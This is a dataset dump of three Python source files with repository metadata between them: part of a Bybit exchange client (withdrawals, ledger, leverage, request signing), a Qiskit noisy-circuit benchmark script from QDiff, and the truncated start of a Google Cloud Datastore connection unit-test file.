return self.parse_transactions(data, currency, since, limit, {'type': 'deposit'})
def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):
self.load_markets()
request = {
# 'coin': currency['id'],
# 'start_date': self.iso8601(since),
# 'end_date': self.iso8601(till),
# 'status': 'Pending', # ToBeConfirmed, UnderReview, Pending, Success, CancelByUser, Reject, Expire
# 'page': 1,
# 'limit': 20, # max 50
}
currency = None
if code is not None:
currency = self.currency(code)
request['coin'] = currency['id']
if since is not None:
request['start_date'] = self.yyyymmdd(since)
if limit is not None:
request['limit'] = limit
response = self.v2PrivateGetWalletWithdrawList(self.extend(request, params))
#
# {
# "ret_code": 0,
# "ret_msg": "ok",
# "ext_code": "",
# "result": {
# "data": [
# {
# "id": 137,
# "user_id": 1,
# "coin": "XRP", # Coin Enum
# "status": "Pending", # Withdraw Status Enum
# "amount": "20.00000000",
# "fee": "0.25000000",
# "address": "rH7H595XYEVTEHU2FySYsWnmfACBnZS9zM",
# "tx_id": "",
# "submited_at": "2019-06-11T02:20:24.000Z",
# "updated_at": "2019-06-11T02:20:24.000Z"
# },
# ],
# "current_page": 1,
# "last_page": 1
# },
# "ext_info": null,
# "time_now": "1577482295.125488",
# "rate_limit_status": 119,
# "rate_limit_reset_ms": 1577482295132,
# "rate_limit": 120
# }
#
result = self.safe_value(response, 'result', {})
data = self.safe_value(result, 'data', [])
return self.parse_transactions(data, currency, since, limit, {'type': 'withdrawal'})
def parse_transaction_status(self, status):
statuses = {
'ToBeConfirmed': 'pending',
'UnderReview': 'pending',
'Pending': 'pending',
'Success': 'ok',
'CancelByUser': 'canceled',
'Reject': 'rejected',
'Expire': 'expired',
}
return self.safe_string(statuses, status, status)
def parse_transaction(self, transaction, currency=None):
#
# fetchWithdrawals
#
# {
# "id": 137,
# "user_id": 1,
# "coin": "XRP", # Coin Enum
# "status": "Pending", # Withdraw Status Enum
# "amount": "20.00000000",
# "fee": "0.25000000",
# "address": "rH7H595XYEVTEHU2FySYsWnmfACBnZS9zM",
# "tx_id": "",
# "submited_at": "2019-06-11T02:20:24.000Z",
# "updated_at": "2019-06-11T02:20:24.000Z"
# }
#
# fetchDeposits ledger entries
#
# {
# "id": 234467,
# "user_id": 1,
# "coin": "BTC",
# "wallet_id": 27913,
# "type": "Realized P&L",
# "amount": "-0.00000006",
# "tx_id": "",
# "address": "BTCUSD",
# "wallet_balance": "0.03000330",
# "exec_time": "2019-12-09T00:00:25.000Z",
# "cross_seq": 0
# }
#
currencyId = self.safe_string(transaction, 'coin')
code = self.safe_currency_code(currencyId, currency)
timestamp = self.parse8601(self.safe_string_2(transaction, 'submited_at', 'exec_time'))
updated = self.parse8601(self.safe_string(transaction, 'updated_at'))
status = self.parse_transaction_status(self.safe_string(transaction, 'status'))
address = self.safe_string(transaction, 'address')
feeCost = self.safe_number(transaction, 'fee')
type = self.safe_string_lower(transaction, 'type')
fee = None
if feeCost is not None:
fee = {
'cost': feeCost,
'currency': code,
}
return {
'info': transaction,
'id': self.safe_string(transaction, 'id'),
'txid': self.safe_string(transaction, 'tx_id'),
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'address': address,
'addressTo': None,
'addressFrom': None,
'tag': None,
'tagTo': None,
'tagFrom': None,
'type': type,
'amount': self.safe_number(transaction, 'amount'),
'currency': code,
'status': status,
'updated': updated,
'fee': fee,
}
def fetch_ledger(self, code=None, since=None, limit=None, params={}):
self.load_markets()
request = {
# 'coin': currency['id'],
# 'currency': currency['id'], # alias
# 'start_date': self.iso8601(since),
# 'end_date': self.iso8601(till),
# 'wallet_fund_type': 'Deposit', # Withdraw, RealisedPNL, Commission, Refund, Prize, ExchangeOrderWithdraw, ExchangeOrderDeposit
# 'page': 1,
# 'limit': 20, # max 50
}
currency = None
if code is not None:
currency = self.currency(code)
request['coin'] = currency['id']
if since is not None:
request['start_date'] = self.yyyymmdd(since)
if limit is not None:
request['limit'] = limit
response = self.v2PrivateGetWalletFundRecords(self.extend(request, params))
#
# {
# "ret_code": 0,
# "ret_msg": "ok",
# "ext_code": "",
# "result": {
# "data": [
# {
# "id": 234467,
# "user_id": 1,
# "coin": "BTC",
# "wallet_id": 27913,
# "type": "Realized P&L",
# "amount": "-0.00000006",
# "tx_id": "",
# "address": "BTCUSD",
# "wallet_balance": "0.03000330",
# "exec_time": "2019-12-09T00:00:25.000Z",
# "cross_seq": 0
# }
# ]
# },
# "ext_info": null,
# "time_now": "1577481867.115552",
# "rate_limit_status": 119,
# "rate_limit_reset_ms": 1577481867122,
# "rate_limit": 120
# }
#
result = self.safe_value(response, 'result', {})
data = self.safe_value(result, 'data', [])
return self.parse_ledger(data, currency, since, limit)
def parse_ledger_entry(self, item, currency=None):
#
# {
# "id": 234467,
# "user_id": 1,
# "coin": "BTC",
# "wallet_id": 27913,
# "type": "Realized P&L",
# "amount": "-0.00000006",
# "tx_id": "",
# "address": "BTCUSD",
# "wallet_balance": "0.03000330",
# "exec_time": "2019-12-09T00:00:25.000Z",
# "cross_seq": 0
# }
#
currencyId = self.safe_string(item, 'coin')
code = self.safe_currency_code(currencyId, currency)
amount = self.safe_number(item, 'amount')
after = self.safe_number(item, 'wallet_balance')
direction = 'out' if (amount < 0) else 'in'
before = None
if after is not None and amount is not None:
difference = amount if (direction == 'out') else -amount
before = self.sum(after, difference)
timestamp = self.parse8601(self.safe_string(item, 'exec_time'))
type = self.parse_ledger_entry_type(self.safe_string(item, 'type'))
id = self.safe_string(item, 'id')
referenceId = self.safe_string(item, 'tx_id')
return {
'id': id,
'currency': code,
'account': self.safe_string(item, 'wallet_id'),
'referenceAccount': None,
'referenceId': referenceId,
'status': None,
'amount': amount,
'before': before,
'after': after,
'fee': None,
'direction': direction,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'type': type,
'info': item,
}
def parse_ledger_entry_type(self, type):
types = {
'Deposit': 'transaction',
'Withdraw': 'transaction',
'RealisedPNL': 'trade',
'Commission': 'fee',
'Refund': 'cashback',
'Prize': 'prize', # ?
'ExchangeOrderWithdraw': 'transaction',
'ExchangeOrderDeposit': 'transaction',
}
return self.safe_string(types, type, type)
def fetch_positions(self, symbols=None, params={}):
self.load_markets()
request = {}
if isinstance(symbols, list):
length = len(symbols)
if length != 1:
raise ArgumentsRequired(self.id + ' fetchPositions takes an array with exactly one symbol')
request['symbol'] = self.market_id(symbols[0])
defaultType = self.safe_string(self.options, 'defaultType', 'linear')
type = self.safe_string(params, 'type', defaultType)
params = self.omit(params, 'type')
response = None
if type == 'linear':
response = self.privateLinearGetPositionList(self.extend(request, params))
elif type == 'inverse':
response = self.v2PrivateGetPositionList(self.extend(request, params))
elif type == 'inverseFuture':
response = self.futuresPrivateGetPositionList(self.extend(request, params))
if (isinstance(response, basestring)) and self.is_json_encoded_object(response):
response = json.loads(response)
#
# {
# ret_code: 0,
# ret_msg: 'OK',
# ext_code: '',
# ext_info: '',
# result: [] or {} depending on the request
# }
#
return self.safe_value(response, 'result')
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
type = self.safe_string(api, 0)
section = self.safe_string(api, 1)
if type == 'spot':
if section == 'public':
section = 'v1'
else:
section += '/v1'
url = self.implode_hostname(self.urls['api'][type])
request = '/' + type + '/' + section + '/' + path
if (type == 'spot') or (type == 'quote'):
if params:
request += '?' + self.rawencode(params)
elif section == 'public':
if params:
request += '?' + self.rawencode(params)
elif type == 'public':
if params:
request += '?' + self.rawencode(params)
else:
self.check_required_credentials()
timestamp = self.nonce()
query = self.extend(params, {
'api_key': self.apiKey,
'recv_window': self.options['recvWindow'],
'timestamp': timestamp,
})
sortedQuery = self.keysort(query)
auth = self.rawencode(sortedQuery)
signature = self.hmac(self.encode(auth), self.encode(self.secret))
if method == 'POST':
body = self.json(self.extend(query, {
'sign': signature,
}))
headers = {
'Content-Type': 'application/json',
}
else:
request += '?' + self.urlencode(sortedQuery) + '&sign=' + signature
url += request
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, httpCode, reason, url, method, headers, body, response, requestHeaders, requestBody):
if not response:
return # fallback to default error handler
#
# {
# ret_code: 10001,
# ret_msg: 'ReadMapCB: expect {or n, but found \u0000, error ' +
# 'found in #0 byte of ...||..., bigger context ' +
# '...||...',
# ext_code: '',
# ext_info: '',
# result: null,
# time_now: '1583934106.590436'
# }
#
errorCode = self.safe_string(response, 'ret_code')
if errorCode != '0':
feedback = self.id + ' ' + body
self.throw_exactly_matched_exception(self.exceptions['exact'], errorCode, feedback)
self.throw_broadly_matched_exception(self.exceptions['broad'], body, feedback)
raise ExchangeError(feedback) # unknown message
def set_margin_mode(self, marginType, symbol=None, params={}):
#
# {
# "ret_code": 0,
# "ret_msg": "ok",
# "ext_code": "",
# "result": null,
# "ext_info": null,
# "time_now": "1577477968.175013",
# "rate_limit_status": 74,
# "rate_limit_reset_ms": 1577477968183,
# "rate_limit": 75
# }
#
leverage = self.safe_value(params, 'leverage')
if leverage is None:
raise ArgumentsRequired(self.id + '.setMarginMode requires a leverage parameter')
marginType = marginType.upper()
if (marginType != 'ISOLATED') and (marginType != 'CROSSED'):
raise BadRequest(self.id + ' marginType must be either isolated or crossed')
self.load_markets()
market = self.market(symbol)
method = None
defaultType = self.safe_string(self.options, 'defaultType', 'linear')
marketTypes = self.safe_value(self.options, 'marketTypes', {})
marketType = self.safe_string(marketTypes, symbol, defaultType)
linear = market['linear'] or (marketType == 'linear')
inverse = (market['swap'] and market['inverse']) or (marketType == 'inverse')
futures = market['futures'] or (marketType == 'futures')
if linear:
method = 'privateLinearPostPositionSwitchIsolated'
elif inverse:
method = 'v2PrivatePostPositionSwitchIsolated'
elif futures:
method = 'privateFuturesPostPositionSwitchIsolated'
isIsolated = (marginType == 'ISOLATED')
request = {
'symbol': market['id'],
'is_isolated': isIsolated,
'buy_leverage': leverage,
'sell_leverage': leverage,
}
return getattr(self, method)(self.extend(request, params))
def set_leverage(self, leverage, symbol=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' setLeverage() requires a symbol argument')
self.load_markets()
market = self.market(symbol)
# WARNING: THIS WILL INCREASE LIQUIDATION PRICE FOR OPEN ISOLATED LONG POSITIONS
# AND DECREASE LIQUIDATION PRICE FOR OPEN ISOLATED SHORT POSITIONS
defaultType = self.safe_string(self.options, 'defaultType', 'linear')
marketTypes = self.safe_value(self.options, 'marketTypes', {})
marketType = self.safe_string(marketTypes, symbol, defaultType)
linear = market['linear'] or (marketType == 'linear')
inverse = (market['swap'] and market['inverse']) or (marketType == 'inverse')
futures = market['futures'] or (marketType == 'futures')
method = None
if linear:
method = 'privateLinearPostPositionSetLeverage'
elif inverse:
method = 'v2PrivatePostPositionLeverageSave'
elif futures:
method = 'privateFuturesPostPositionLeverageSave'
buy_leverage = leverage
sell_leverage = leverage
if params['buy_leverage'] and params['sell_leverage'] and linear:
buy_leverage = params['buy_leverage']
sell_leverage = params['sell_leverage']
elif not leverage:
if linear:
raise ArgumentsRequired(self.id + ' setLeverage() requires either the parameter leverage or params["buy_leverage"] and params["sell_leverage"] for linear contracts')
else:
raise ArgumentsRequired(self.id + ' setLeverage() requires parameter leverage for inverse and futures contracts')
if (buy_leverage < 1) or (buy_leverage > 100) or (sell_leverage < 1) or (sell_leverage > 100):
raise BadRequest(self.id + ' leverage should be between 1 and 100')
request = {
'symbol': market['id'],
'leverage_only': True,
}
if not linear:
request['leverage'] = buy_leverage
else:
request['buy_leverage'] = buy_leverage
request['sell_leverage'] = sell_leverage
return getattr(self, method)(self.extend(request, params))
| [
"travis@travis-ci.org"
] | travis@travis-ci.org |
abac750ec39d365e349d684cf03414f5725f8da0 | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startQiskit_noisy2506.py | a7fde2d65a26c997e4016788e19ab6906db2feb1 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,134 | py | # qubit number=4
# total number=37
import cirq
import qiskit
from qiskit.providers.aer import QasmSimulator
from qiskit.test.mock import FakeVigo
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2
import numpy as np
import networkx as nx
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f
# NOTE: use multi_control_toffoli_gate ('noancilla' mode)
# https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
# https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
# https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[3]) # number=19
prog.cz(input_qubit[0],input_qubit[3]) # number=20
prog.h(input_qubit[3]) # number=21
prog.cx(input_qubit[0],input_qubit[3]) # number=23
prog.x(input_qubit[3]) # number=24
prog.cx(input_qubit[0],input_qubit[3]) # number=25
prog.cx(input_qubit[0],input_qubit[3]) # number=17
prog.rx(-0.48380526865282825,input_qubit[3]) # number=26
prog.h(input_qubit[1]) # number=2
prog.y(input_qubit[3]) # number=18
prog.h(input_qubit[2]) # number=3
prog.h(input_qubit[3]) # number=4
prog.y(input_qubit[3]) # number=12
prog.h(input_qubit[0]) # number=5
oracle = build_oracle(n-1, f)
prog.append(oracle.to_gate(),[input_qubit[i] for i in range(n-1)]+[input_qubit[n-1]])
prog.h(input_qubit[1]) # number=6
prog.h(input_qubit[2]) # number=7
prog.cx(input_qubit[0],input_qubit[1]) # number=28
prog.h(input_qubit[1]) # number=34
prog.cz(input_qubit[0],input_qubit[1]) # number=35
prog.h(input_qubit[1]) # number=36
prog.x(input_qubit[1]) # number=32
prog.cx(input_qubit[0],input_qubit[1]) # number=33
prog.cx(input_qubit[0],input_qubit[1]) # number=30
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[0]) # number=9
prog.y(input_qubit[2]) # number=10
prog.x(input_qubit[2]) # number=22
prog.y(input_qubit[2]) # number=11
prog.x(input_qubit[0]) # number=13
prog.x(input_qubit[0]) # number=14
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
a = "111"
b = "0"
f = lambda rep: bitwise_xor(bitwise_dot(a, rep), b)
prog = make_circuit(4,f)
backend = FakeVigo()
sample_shot =8000
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit_noisy2506.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.__len__(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| [
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
5f2b28c666e9d573c062026014cbd9a27b6abbc2 | 0ac38e9eaa2fb90cf55bbd4ab94055e6a4416b3e | /lib/unit_tests/datastore/test_connection.py | 244975f063f02ad1eeae6c5b767539976ceba906 | [
"Apache-2.0"
] | permissive | varnachandar/emotion2music | 6f5a42c8dd5542ad3ea919e366f906666cb4c299 | aa58c80d5ea81cfba7760b8f9b3151db9c61b6bc | refs/heads/master | 2020-04-27T15:12:44.795220 | 2019-03-07T23:59:11 | 2019-03-07T23:59:11 | 174,437,101 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 41,443 | py | # Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from google.cloud.datastore.connection import _HAVE_GRPC
class Test_DatastoreAPIOverHttp(unittest.TestCase):
def _getTargetClass(self):
from google.cloud.datastore.connection import _DatastoreAPIOverHttp
return _DatastoreAPIOverHttp
def _makeOne(self, *args, **kw):
return self._getTargetClass()(*args, **kw)
def test__rpc(self):
class ReqPB(object):
def SerializeToString(self):
return REQPB
class RspPB(object):
def __init__(self, pb):
self._pb = pb
@classmethod
def FromString(cls, pb):
return cls(pb)
REQPB = b'REQPB'
PROJECT = 'PROJECT'
METHOD = 'METHOD'
URI = 'http://api-url'
conn = _Connection(URI)
datastore_api = self._makeOne(conn)
http = conn.http = Http({'status': '200'}, 'CONTENT')
response = datastore_api._rpc(PROJECT, METHOD, ReqPB(), RspPB)
self.assertTrue(isinstance(response, RspPB))
self.assertEqual(response._pb, 'CONTENT')
called_with = http._called_with
self.assertEqual(called_with['uri'], URI)
self.assertEqual(called_with['method'], 'POST')
self.assertEqual(called_with['headers']['Content-Type'],
'application/x-protobuf')
self.assertEqual(called_with['headers']['User-Agent'],
conn.USER_AGENT)
self.assertEqual(called_with['body'], REQPB)
self.assertEqual(conn.build_kwargs,
[{'method': METHOD, 'project': PROJECT}])
def test__request_w_200(self):
PROJECT = 'PROJECT'
METHOD = 'METHOD'
DATA = b'DATA'
URI = 'http://api-url'
conn = _Connection(URI)
datastore_api = self._makeOne(conn)
http = conn.http = Http({'status': '200'}, 'CONTENT')
self.assertEqual(datastore_api._request(PROJECT, METHOD, DATA),
'CONTENT')
called_with = http._called_with
self.assertEqual(called_with['uri'], URI)
self.assertEqual(called_with['method'], 'POST')
self.assertEqual(called_with['headers']['Content-Type'],
'application/x-protobuf')
self.assertEqual(called_with['headers']['User-Agent'],
conn.USER_AGENT)
self.assertEqual(called_with['body'], DATA)
self.assertEqual(conn.build_kwargs,
[{'method': METHOD, 'project': PROJECT}])
def test__request_not_200(self):
from google.cloud.exceptions import BadRequest
from google.rpc import status_pb2
error = status_pb2.Status()
error.message = 'Entity value is indexed.'
error.code = 9 # FAILED_PRECONDITION
PROJECT = 'PROJECT'
METHOD = 'METHOD'
DATA = 'DATA'
URI = 'http://api-url'
conn = _Connection(URI)
datastore_api = self._makeOne(conn)
conn.http = Http({'status': '400'}, error.SerializeToString())
with self.assertRaises(BadRequest) as exc:
datastore_api._request(PROJECT, METHOD, DATA)
expected_message = '400 Entity value is indexed.'
self.assertEqual(str(exc.exception), expected_message)
self.assertEqual(conn.build_kwargs,
[{'method': METHOD, 'project': PROJECT}])
class Test_DatastoreAPIOverGRPC(unittest.TestCase):
def _getTargetClass(self):
from google.cloud.datastore.connection import _DatastoreAPIOverGRPC
return _DatastoreAPIOverGRPC
def _makeOne(self, stub, connection=None, secure=True, mock_args=None):
from unit_tests._testing import _Monkey
from google.cloud.datastore import connection as MUT
if connection is None:
connection = _Connection(None)
connection.credentials = object()
connection.host = 'CURR_HOST'
if mock_args is None:
mock_args = []
def mock_make_stub(*args):
mock_args.append(args)
return stub
if secure:
to_monkey = {'make_secure_stub': mock_make_stub}
else:
to_monkey = {'make_insecure_stub': mock_make_stub}
with _Monkey(MUT, **to_monkey):
return self._getTargetClass()(connection, secure)
def test_constructor(self):
from google.cloud.datastore import connection as MUT
conn = _Connection(None)
conn.credentials = object()
conn.host = 'CURR_HOST'
stub = _GRPCStub()
mock_args = []
datastore_api = self._makeOne(stub, connection=conn,
mock_args=mock_args)
self.assertIs(datastore_api._stub, stub)
self.assertEqual(mock_args, [(
conn.credentials,
conn.USER_AGENT,
MUT.datastore_grpc_pb2.DatastoreStub,
conn.host,
)])
def test_constructor_insecure(self):
from google.cloud.datastore import connection as MUT
conn = _Connection(None)
conn.credentials = object()
conn.host = 'CURR_HOST:1234'
stub = _GRPCStub()
mock_args = []
datastore_api = self._makeOne(stub, connection=conn,
secure=False,
mock_args=mock_args)
self.assertIs(datastore_api._stub, stub)
self.assertEqual(mock_args, [(
MUT.datastore_grpc_pb2.DatastoreStub,
conn.host,
)])
def test_lookup(self):
return_val = object()
stub = _GRPCStub(return_val)
datastore_api = self._makeOne(stub=stub)
request_pb = _RequestPB()
project = 'PROJECT'
result = datastore_api.lookup(project, request_pb)
self.assertIs(result, return_val)
self.assertEqual(request_pb.project_id, project)
self.assertEqual(stub.method_calls,
[(request_pb, 'Lookup')])
def test_run_query(self):
return_val = object()
stub = _GRPCStub(return_val)
datastore_api = self._makeOne(stub=stub)
request_pb = _RequestPB()
project = 'PROJECT'
result = datastore_api.run_query(project, request_pb)
self.assertIs(result, return_val)
self.assertEqual(request_pb.project_id, project)
self.assertEqual(stub.method_calls,
[(request_pb, 'RunQuery')])
def test_begin_transaction(self):
return_val = object()
stub = _GRPCStub(return_val)
datastore_api = self._makeOne(stub=stub)
request_pb = _RequestPB()
project = 'PROJECT'
result = datastore_api.begin_transaction(project, request_pb)
self.assertIs(result, return_val)
self.assertEqual(request_pb.project_id, project)
self.assertEqual(
stub.method_calls,
[(request_pb, 'BeginTransaction')])
def test_commit_success(self):
return_val = object()
stub = _GRPCStub(return_val)
datastore_api = self._makeOne(stub=stub)
request_pb = _RequestPB()
project = 'PROJECT'
result = datastore_api.commit(project, request_pb)
self.assertIs(result, return_val)
self.assertEqual(request_pb.project_id, project)
self.assertEqual(stub.method_calls,
[(request_pb, 'Commit')])
def _commit_failure_helper(self, exc, err_class):
stub = _GRPCStub(side_effect=exc)
datastore_api = self._makeOne(stub=stub)
request_pb = _RequestPB()
project = 'PROJECT'
with self.assertRaises(err_class):
datastore_api.commit(project, request_pb)
self.assertEqual(request_pb.project_id, project)
self.assertEqual(stub.method_calls,
[(request_pb, 'Commit')])
@unittest.skipUnless(_HAVE_GRPC, 'No gRPC')
def test_commit_failure_aborted(self):
from grpc import StatusCode
from grpc._channel import _RPCState
from google.cloud.exceptions import Conflict
from google.cloud.exceptions import GrpcRendezvous
details = 'Bad things.'
exc_state = _RPCState((), None, None, StatusCode.ABORTED, details)
exc = GrpcRendezvous(exc_state, None, None, None)
self._commit_failure_helper(exc, Conflict)
@unittest.skipUnless(_HAVE_GRPC, 'No gRPC')
def test_commit_failure_cancelled(self):
from grpc import StatusCode
from grpc._channel import _RPCState
from google.cloud.exceptions import GrpcRendezvous
exc_state = _RPCState((), None, None, StatusCode.CANCELLED, None)
exc = GrpcRendezvous(exc_state, None, None, None)
self._commit_failure_helper(exc, GrpcRendezvous)
@unittest.skipUnless(_HAVE_GRPC, 'No gRPC')
def test_commit_failure_non_grpc_err(self):
exc = RuntimeError('Not a gRPC error')
self._commit_failure_helper(exc, RuntimeError)
def test_rollback(self):
return_val = object()
stub = _GRPCStub(return_val)
datastore_api = self._makeOne(stub=stub)
request_pb = _RequestPB()
project = 'PROJECT'
result = datastore_api.rollback(project, request_pb)
self.assertIs(result, return_val)
self.assertEqual(request_pb.project_id, project)
self.assertEqual(stub.method_calls,
[(request_pb, 'Rollback')])
def test_allocate_ids(self):
return_val = object()
stub = _GRPCStub(return_val)
datastore_api = self._makeOne(stub=stub)
request_pb = _RequestPB()
project = 'PROJECT'
result = datastore_api.allocate_ids(project, request_pb)
self.assertIs(result, return_val)
self.assertEqual(request_pb.project_id, project)
self.assertEqual(
stub.method_calls,
[(request_pb, 'AllocateIds')])
class TestConnection(unittest.TestCase):
def _getTargetClass(self):
from google.cloud.datastore.connection import Connection
return Connection
def _make_key_pb(self, project, id_=1234):
from google.cloud.datastore.key import Key
path_args = ('Kind',)
if id_ is not None:
path_args += (id_,)
return Key(*path_args, project=project).to_protobuf()
def _make_query_pb(self, kind):
from google.cloud.datastore._generated import query_pb2
pb = query_pb2.Query()
pb.kind.add().name = kind
return pb
def _makeOne(self, credentials=None, http=None, use_grpc=False):
from unit_tests._testing import _Monkey
from google.cloud.datastore import connection as MUT
with _Monkey(MUT, _USE_GRPC=use_grpc):
return self._getTargetClass()(credentials=credentials, http=http)
def _verifyProtobufCall(self, called_with, URI, conn):
self.assertEqual(called_with['uri'], URI)
self.assertEqual(called_with['method'], 'POST')
self.assertEqual(called_with['headers']['Content-Type'],
'application/x-protobuf')
self.assertEqual(called_with['headers']['User-Agent'],
conn.USER_AGENT)
def test_default_url(self):
klass = self._getTargetClass()
conn = self._makeOne()
self.assertEqual(conn.api_base_url, klass.API_BASE_URL)
def test_custom_url_from_env(self):
import os
from unit_tests._testing import _Monkey
from google.cloud.connection import API_BASE_URL
from google.cloud.environment_vars import GCD_HOST
HOST = 'CURR_HOST'
fake_environ = {GCD_HOST: HOST}
with _Monkey(os, environ=fake_environ):
conn = self._makeOne()
self.assertNotEqual(conn.api_base_url, API_BASE_URL)
self.assertEqual(conn.api_base_url, 'http://' + HOST)
def test_ctor_defaults(self):
conn = self._makeOne()
self.assertEqual(conn.credentials, None)
def test_ctor_without_grpc(self):
from unit_tests._testing import _Monkey
from google.cloud.datastore import connection as MUT
connections = []
return_val = object()
def mock_api(connection):
connections.append(connection)
return return_val
with _Monkey(MUT, _DatastoreAPIOverHttp=mock_api):
conn = self._makeOne(use_grpc=False)
self.assertEqual(conn.credentials, None)
self.assertIs(conn._datastore_api, return_val)
self.assertEqual(connections, [conn])
def test_ctor_with_grpc(self):
from unit_tests._testing import _Monkey
from google.cloud.datastore import connection as MUT
api_args = []
return_val = object()
def mock_api(connection, secure):
api_args.append((connection, secure))
return return_val
with _Monkey(MUT, _DatastoreAPIOverGRPC=mock_api):
conn = self._makeOne(use_grpc=True)
self.assertEqual(conn.credentials, None)
self.assertIs(conn._datastore_api, return_val)
self.assertEqual(api_args, [(conn, True)])
def test_ctor_explicit(self):
class Creds(object):
def create_scoped_required(self):
return False
creds = Creds()
conn = self._makeOne(creds)
self.assertTrue(conn.credentials is creds)
def test_http_w_existing(self):
conn = self._makeOne()
conn._http = http = object()
self.assertTrue(conn.http is http)
def test_http_wo_creds(self):
import httplib2
conn = self._makeOne()
self.assertTrue(isinstance(conn.http, httplib2.Http))
def test_http_w_creds(self):
import httplib2
authorized = object()
class Creds(object):
def authorize(self, http):
self._called_with = http
return authorized
def create_scoped_required(self):
return False
creds = Creds()
conn = self._makeOne(creds)
self.assertTrue(conn.http is authorized)
self.assertTrue(isinstance(creds._called_with, httplib2.Http))
def test_build_api_url_w_default_base_version(self):
PROJECT = 'PROJECT'
METHOD = 'METHOD'
conn = self._makeOne()
URI = '/'.join([
conn.api_base_url,
conn.API_VERSION,
'projects',
PROJECT + ':' + METHOD,
])
self.assertEqual(conn.build_api_url(PROJECT, METHOD), URI)
def test_build_api_url_w_explicit_base_version(self):
BASE = 'http://example.com/'
VER = '3.1415926'
PROJECT = 'PROJECT'
METHOD = 'METHOD'
conn = self._makeOne()
URI = '/'.join([
BASE,
VER,
'projects',
PROJECT + ':' + METHOD,
])
self.assertEqual(conn.build_api_url(PROJECT, METHOD, BASE, VER),
URI)
def test_lookup_single_key_empty_response(self):
from google.cloud.datastore._generated import datastore_pb2
PROJECT = 'PROJECT'
key_pb = self._make_key_pb(PROJECT)
rsp_pb = datastore_pb2.LookupResponse()
conn = self._makeOne()
URI = '/'.join([
conn.api_base_url,
conn.API_VERSION,
'projects',
PROJECT + ':lookup',
])
http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
found, missing, deferred = conn.lookup(PROJECT, [key_pb])
self.assertEqual(len(found), 0)
self.assertEqual(len(missing), 0)
self.assertEqual(len(deferred), 0)
cw = http._called_with
self._verifyProtobufCall(cw, URI, conn)
rq_class = datastore_pb2.LookupRequest
request = rq_class()
request.ParseFromString(cw['body'])
keys = list(request.keys)
self.assertEqual(len(keys), 1)
self.assertEqual(key_pb, keys[0])
def test_lookup_single_key_empty_response_w_eventual(self):
from google.cloud.datastore._generated import datastore_pb2
PROJECT = 'PROJECT'
key_pb = self._make_key_pb(PROJECT)
rsp_pb = datastore_pb2.LookupResponse()
conn = self._makeOne()
URI = '/'.join([
conn.api_base_url,
conn.API_VERSION,
'projects',
PROJECT + ':lookup',
])
http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
found, missing, deferred = conn.lookup(PROJECT, [key_pb],
eventual=True)
self.assertEqual(len(found), 0)
self.assertEqual(len(missing), 0)
self.assertEqual(len(deferred), 0)
cw = http._called_with
self._verifyProtobufCall(cw, URI, conn)
rq_class = datastore_pb2.LookupRequest
request = rq_class()
request.ParseFromString(cw['body'])
keys = list(request.keys)
self.assertEqual(len(keys), 1)
self.assertEqual(key_pb, keys[0])
self.assertEqual(request.read_options.read_consistency,
datastore_pb2.ReadOptions.EVENTUAL)
self.assertEqual(request.read_options.transaction, b'')
def test_lookup_single_key_empty_response_w_eventual_and_transaction(self):
PROJECT = 'PROJECT'
TRANSACTION = b'TRANSACTION'
key_pb = self._make_key_pb(PROJECT)
conn = self._makeOne()
self.assertRaises(ValueError, conn.lookup, PROJECT, key_pb,
